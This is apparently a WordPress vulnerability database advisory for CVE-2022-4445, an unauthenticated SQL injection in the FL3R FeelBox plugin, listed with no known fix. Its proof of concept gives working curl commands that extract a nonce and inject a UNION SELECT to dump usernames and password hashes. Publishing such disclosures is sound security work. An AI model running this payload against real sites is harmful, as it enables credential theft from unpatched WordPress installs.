WordPress Plugin Vulnerabilities

FL3R FeelBox <= 8.1 - Unauthenticated SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Proof of Concept

1. Visit a blog post and extract the nonce from the source (search for "feelboxAjax", and extract the "token")

    curl -s 'http://127.0.0.1:7777/?p=1' | grep 'token'

2. Invoke the following curl command, with the just obtained nonce (token), to disclose the first user's username and password hash:

    curl 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=populate_post' \
        --data 'token=<NONCE HERE>&postID=1 UNION ALL SELECT 1,1,CONCAT((SELECT user_login FROM wp_users),CHR(0x3a),(SELECT user_pass FROM wp_users)),1,1,1,1-- -'

Affects Plugins

Plugin icon
fl3r-feelbox
No known fix

References

CVE
CVE-2022-4445

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.6 (high)

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified
Yes
WPVDB ID
9bb6fde0-1347-496b-be03-3512e6b7e8f8

Timeline

Publicly Published
2023-01-20 (about 1 years ago)
Added
2023-01-20 (about 1 years ago)
Last Updated
2023-01-20 (about 1 years ago)

Other

Published
Title
Published
2024-04-02
Title
LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
Published
2014-10-11
Title
Huge IT Image Gallery 1.0.1 - SQL Injection
Published
2023-07-12
Title
FluentForm < 5.0.0 - SQL Injection
Published
2015-01-28
Title
Photo Gallery < 1.2.11 - Blind SQL Injection
Published
2014-08-01
Title
All-in-One Event Calendar 1.9 - index.php Multiple Parameter SQL Injection